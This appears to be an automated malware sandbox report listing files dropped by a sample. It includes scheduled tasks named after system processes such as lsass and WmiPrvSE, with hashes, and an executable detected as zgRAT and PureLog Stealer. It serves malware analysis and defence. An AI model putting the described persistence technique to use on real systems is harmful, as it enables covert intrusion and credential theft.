                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.4.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.S.e.r.v.e.r.C.o.m.p.o.n.e.n.t.h.o.s.t.M.o.n.i.t.o.r.D.l.l.S.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.9.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3262
                                                              Entropy (8bit):3.5962895789243126
                                                              Encrypted:false
                                                              SSDEEP:96:tkvGnRiDEpnBnknNGki3igVA9ll7dhFnO+:PRh/yNw3UrhE+
                                                              MD5:51FF15C77EFB49C208193E4D58D49C10
                                                              SHA1:66E0944B8A1BFA082EB473C0E8DCE3C1DDB4C1AF
                                                              SHA-256:6C3203980FC09349F1F58BDBA460F470313DEE16DA8A684B250940CEA326AA16
                                                              SHA-512:3F0A2A3820FEE1A1826107BFEC3BA2B9CFD2F1F5A8631DB37FB118247C83B0428716796556177DB4039BF75D2D444EEED0A60EEC5D9AAD941E185BC9D90941A9
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.4.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.W.m.i.P.r.v.S.E.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3520
                                                              Entropy (8bit):3.577043330177648
                                                              Encrypted:false
                                                              SSDEEP:96:tkv3XdRiDenBnknNGki3igVA9ll7dhFnO+:GXdRxyNw3UrhE+
                                                              MD5:65480DCAD8BABEB6C6D7C6500D62908A
                                                              SHA1:A26BA59E1E8AD136FB32FE6241412D41CC05ED89
                                                              SHA-256:65287E8D3604D2109E58FFFA32B7FF03E88FFE1EF9D053578227B882E8122009
                                                              SHA-512:87757C121E24593A9CD0EB333C0689258A086464EC271A32B9BF1584421372F2F2E226EC0F3CE4EC42B5C48E32A520927E346DB809EDD7ED17DDAE1583FEF792
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.4.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.W.m.i.P.r.v.S.E.W.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.7.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3250
                                                              Entropy (8bit):3.584553780768116
                                                              Encrypted:false
                                                              SSDEEP:96:t7v5nRiDEpnBnknNGki3igVA9ll7dhFNd+:HRh/yNw3Urh1+
                                                              MD5:055B10136D8FC17D7738660774ABD4A8
                                                              SHA1:8E8F8A14BF6E1897AF6EA91B8671876F0CD4A8B5
                                                              SHA-256:F7A5940D21F1373972F1A73F79EC875A88773FD2F2B75246BACA96850286B9AD
                                                              SHA-512:2D591B17ED33475991103752FD5FE93CA4FD87DB9443AE1935D41B55DCF64F26BF03914C3926720BA9F97509A33ACE81669891F6EEAB5C0EEEC482A3A16FBF94
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.3.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.l.s.a.s.s.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3508
                                                              Entropy (8bit):3.5663602712823317
                                                              Encrypted:false
                                                              SSDEEP:96:t7vTvZdRiDenBnknNGki3igVA9ll7dhFNd+:FZdRxyNw3Urh1+
                                                              MD5:41D2CC906881EF90A46F17545501EBAE
                                                              SHA1:E7E146BC2536F6A57C6F737D28BE4CE7E3399187
                                                              SHA-256:CF19B68EBB84EDE26477CFE79D815150E605D054D1C16FDFDFE2ACAB939E4339
                                                              SHA-512:DC89F8ECBCF075A0B92FEE75EA47404F9DD7CA5C2803E23652E00F316206276756EBF36B86F66BD76AF15C399EBDCAEC2F211D7239B212EA9DD37AA0568D05D2
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.3.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.l.s.a.s.s.l.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.9.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3536
                                                              Entropy (8bit):3.57122151569413
                                                              Encrypted:false
                                                              SSDEEP:96:tyvwtdRiDenBnknNGki3igVA9ll7dhFno+:3tdRxyNw3Urhi+
                                                              MD5:078EAB7432C4619E8DAC48A7919B2B6A
                                                              SHA1:99C14EC0897D65FA8F76B5C065B226A296F5AF30
                                                              SHA-256:6445D4912C0CE9FFE448A850BBA16DC7EB86A6E7CB86B22C6501504882CFF5CA
                                                              SHA-512:4363A2DBB250A5D9CF00E246D970C3DFE02D521C7AC8E8F5FF1D468D83F6F7B97D1112E0611215D1A3E3F76285473AE275AF13B30C30C5AE6BA6C844AC151EA6
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.2.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.p.o.w.e.r.s.h.e.l.l.p.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.5.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . .
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3306
                                                              Entropy (8bit):3.589326406251122
                                                              Encrypted:false
                                                              SSDEEP:96:t7vlnRiDEpnBnknNGki3igVA9ll7dhF7+:DRh/yNw3UrhR+
                                                              MD5:6129ED4BC454DCA4BEB57D3DC9A3345D
                                                              SHA1:C1798C71B6C4339AB572FF4F3D70DED836C4152B
                                                              SHA-256:64C175E9F3B5138604DE89A75E90E79D8FB8F2E8FC777594E9AD75BD1FC55AD1
                                                              SHA-512:267DAC346BC14E4D0121B33184911B299A5A2F27B9D29743D335FA97F0529817F3B4885734FD629FE85D89C720C8AD1EC52366FA6197848A5837B1C795B73EB7
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.3.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.s.i.h.o.s.t.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3566
                                                              Entropy (8bit):3.5710454406322345
                                                              Encrypted:false
                                                              SSDEEP:96:t7v+3wdRiDenBnknNGki3igVA9ll7dhF7+:c3wdRxyNw3UrhR+
                                                              MD5:2B0F92084012D7CEEFBF1FE4CAC7DE87
                                                              SHA1:0A67C613BFF4A886526FBCBF86744A6B799F72BA
                                                              SHA-256:CB146A3B5027D233409A8906E74ED1BD7CCCA9EB81A0B3533668555233250B0A
                                                              SHA-512:71A4BCBD9573862203E72C0A8F8E4FE6D63B1125BBAF502329CD71A1DB7E3B3D6309C4F0ABCB58DC7789B63B864AE63818FC21B6F570867E80CF00A7CD755B9F
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.3.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.s.i.h.o.s.t.s.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.3.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with very long lines (808), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):808
                                                              Entropy (8bit):5.8988579258560625
                                                              Encrypted:false
                                                              SSDEEP:12:MN1VYxqgthUYThHkKUB0f7PVerBzDzeo/RhRluOzHvAcAhktEOUMmXUTT1NA:iVYxqghUwHkKjr8Z/xJz4cCkEvET/A
                                                              MD5:B8EA7E071D42BF0956A058CD9E57FAE0
                                                              SHA1:284D0038A589EB8ECD2CFD3EB617952AE4ED500E
                                                              SHA-256:B4BFCB7EF014E9204B9CF34F4C7328BF4C16F0317836C4681D13B01BFF55922B
                                                              SHA-512:6843AA4FE7CA89D52A25D7D5D5BF46C69A73CB8E872C605C046B5557AA289E9DFF7B42E1AF5020B3C2FC190A22A670F7AA213E049CD9014B3888BCF89E8DEB90
                                                              Malicious:false
                                                              Preview:0laN3CsYq5pOLv5WLcoe3JOkT9ogEQH47mTvoCNPOARqNNmOF3baeg4rWz34XMUayvRjcKsJOZP21hWFWabKyqaarlYzIT1Cq12c6Cw4LSMFRB0zcxh7uKmHV010w3A5hNMAp4JUog9feUJpujWVv4RfOuHFK5IRSQhDyzJhoNSNKGmAqMGNgpJn5qv4wDJsYrNNwF14ZzrilDUHIHZ8z5vnH4IIEOukEjzd3YNkULxr8lB1VnwpoK3d5kG17s0KEGdBO1Ot3ynnHEof3QwacF63qWhTRVnlUmn1H9neZDv0gPV15l8q6Zs8KkV2T4biLBTebwX3nRBZTGXaAqYqX6p44orhouLelNoe60aINEDoYToEN52ngvLOWYkwF0P2GgxGb2dJPPcS3Agk9nUt2h80BaIiQoDXyKi2fimUbsXQS2VW29wbgg9ih7EAu53lMFdscnFbA9SKJsiIEvpQ1l1SK9UidmkfzwDMZn4O4VbhOzZzZ568PmtlOLhcTh8YYwUWoVtb1bVfKTDVkeIhqmPMCc8NGb5XXDIceCLDMeHyRNb4IL2yYaswgITLWgVZf7IHLl0hSFVLeb5zBDF4jH96UW5WsAqqJrSTFUtgVUfTFhRFNeKTab0Y8MwzpdzSYpCxIlurUiiOlq0xE0JNzXPr04V2h401eM4aee6lud822mwRW8uzUmcAZU6OQ1JZrrtZvZSk3hcWYXzOIDgjJBg2t4AKhsU3TiKL2Wg6qK5wJFlCesFNVkQqK1p1YHDLMjDzMoVvgk39FusnS8qymHitSdABrphiHtjkCwz0
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68597760
                                                              Entropy (8bit):0.38816501086795074
                                                              Encrypted:false
                                                              SSDEEP:24576:1VJEBWEFKKqXYkSa7ixTVHMoepIQfm9Eymyg+mbqA72E27dyIkzdn3m2OxJ+NikO:1bxzV7id+7yTgJWA6ESkzdWnJc9n
                                                              MD5:01287AA2A0B5D2178CB13C477A04DC21
                                                              SHA1:884039BF4A15A820073CEF5A7D2022A97EF93C8C
                                                              SHA-256:4AF6BBCFF1CD1386DD5023BFBF76E9C532C8F466563768D40459E5CE9A40A52B
                                                              SHA-512:641D8FA8F22C57282139DB3192A50C7B84DAD0E4987327AD728A89BF65D533955589A4ACB31B17179856A4A159F3E2EA105EAAC5A5B255BD3B8E3C9B97973911
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\appcompat\powershell.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\appcompat\powershell.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\appcompat\powershell.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\appcompat\powershell.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?:-g............................./... ...@....@.. ....................................@................................../..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................./......H...........H................H.../.......................................0..........(.... ........8........E........)...N...*...8....(.... ....~y...{....:....& ....8....*(.... ....~y...{....9....& ....8....(.... ....~y...{l...9....& ....8y......0.......... ........8........E................9.......H.......8.......... ....8....8.... ....~y...{....9....& ....8....8.... ....8....~....(M... .... .... ....s....~....(Q....... ....~y...{....:W...& ....8L.......~....(U...~....(Y... .
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with very long lines (861), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):861
                                                              Entropy (8bit):5.8887807215685735
                                                              Encrypted:false
                                                              SSDEEP:24:J7NBAssYMYW90YHDJPSgaLN4UgnR/HcGykPUV2:J7P/NYjJCCO8PUV2
                                                              MD5:0BE8D47FBFB454D2B12BBFDC7AE1B994
                                                              SHA1:BB8E7560BFBE8450CF3AC6A574C35DADFE5F0B73
                                                              SHA-256:D884739AA46D2CB35BB5B5BF2EBF00B20A3A5430DA07B72A623FB7C9D4C1449D
                                                              SHA-512:790471F4D14F45D8FC64C3BAA2EA576A70164A4F31B62F90401841FF5EAEC1D9456709A198F845001D9B2DC2AD2CC44C915D8CA8446455363052B428C078E0DE
                                                              Malicious:false
                                                              Preview:C6T9ktMGa5ewnmSyJ0qFyXIwcMEekRrdxVrkK689UcaQOxTg0lvjj8CoyhhXosfJOA9R5rnM2quW71hp3in9fH4yTCwnZkVm7QCOyBlI7ir2Oqq6A2eGEfnGFK825AxRVIYqzT017eB7aCkmVznhFPhbm5InDsN7uZgFS9HrBnJjeqpDkVgFXQMGl6E3KNyORDMBfeUVs6fcF776PFCrLIkeNaeV5Ogxz4SaeohGAKXbutAn9HnELGCJdryFA9ZdZsmLpgbli6qAuJtdZ1Vykcms1J6w0bFBv3BCGz7cqBgOZBYU8UqJnl37F4TgjovG0pP1HrWj32Hj6XSzumyfv6YJAE6Mgb3BQZYuwhNQ8GPueUBsldv7zPV4RG1CuJDc9GSg9hDNYhhornoqDNkCp5LBDedpqKgyCwuYBetDZhiSrqMnbK8gjBwD4RdfEYhNBtm42QojehnHW3TWR0NfM9PB9qduAN9BAVQ8ESuKgZBBXorA8GONKCBCel4Mx4iQhlHBnUS8FD8w7NnV9dw49v17TOedYiXl0vewhpXnyPIGDOEQ7jMTIoRwuKsY0ykhpX6Mt1xUGIGunu4EJNfyVDdMdsBW78w9okbqS2hGv1N9hgIAQnPnTvLl3tsBzaXHVHFCTNwRpZDe0eo7jBGTtJp3ZzxiJgRUeGnabGrC0773srvYEvbxUDYMbMndaNIJIs9u1OfdUEcvMvKrEYeYEdAarb8OcNmnzyvArBh0P8dPkm9pC5ZBttEoriCZPQAGbz6YAK9C1nIGAu0FbTMgyk3FtHSJ9Hk87Wyuplp25WJFk8o7s786EdS051o210DuDKIo6FZ0oUlbbyevdUaBIo4dD7zy7
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68597760
                                                              Entropy (8bit):0.38816501086795074
                                                              Encrypted:false
                                                              SSDEEP:24576:1VJEBWEFKKqXYkSa7ixTVHMoepIQfm9Eymyg+mbqA72E27dyIkzdn3m2OxJ+NikO:1bxzV7id+7yTgJWA6ESkzdWnJc9n
                                                              MD5:01287AA2A0B5D2178CB13C477A04DC21
                                                              SHA1:884039BF4A15A820073CEF5A7D2022A97EF93C8C
                                                              SHA-256:4AF6BBCFF1CD1386DD5023BFBF76E9C532C8F466563768D40459E5CE9A40A52B
                                                              SHA-512:641D8FA8F22C57282139DB3192A50C7B84DAD0E4987327AD728A89BF65D533955589A4ACB31B17179856A4A159F3E2EA105EAAC5A5B255BD3B8E3C9B97973911
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?:-g............................./... ...@....@.. ....................................@................................../..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................./......H...........H................H.../.......................................0..........(.... ........8........E........)...N...*...8....(.... ....~y...{....:....& ....8....*(.... ....~y...{....9....& ....8....(.... ....~y...{l...9....& ....8y......0.......... ........8........E................9.......H.......8.......... ....8....8.... ....~y...{....9....& ....8....8.... ....8....~....(M... .... .... ....s....~....(Q....... ....~y...{....:W...& ....8L.......~....(U...~....(Y... .
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):212
                                                              Entropy (8bit):5.708713708020551
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:121505A159FAAA411EFD50112B75B55D
                                                              SHA1:55BB4F4585A8C5D68DF06F28333B325D65B219A7
                                                              SHA-256:1A7BE99A73F12DF405FB871EDCEF678F1B32E28CA670B0DB142F59CC910A227B
                                                              SHA-512:80EFFF86556060524FF8839CB0471D3A938E9063DBDF817640A0CE8BD78D3CFF601EBC03D89B2473B01C8F2B1720A07A8C1F04110F1AA2077D0739620563F7F8
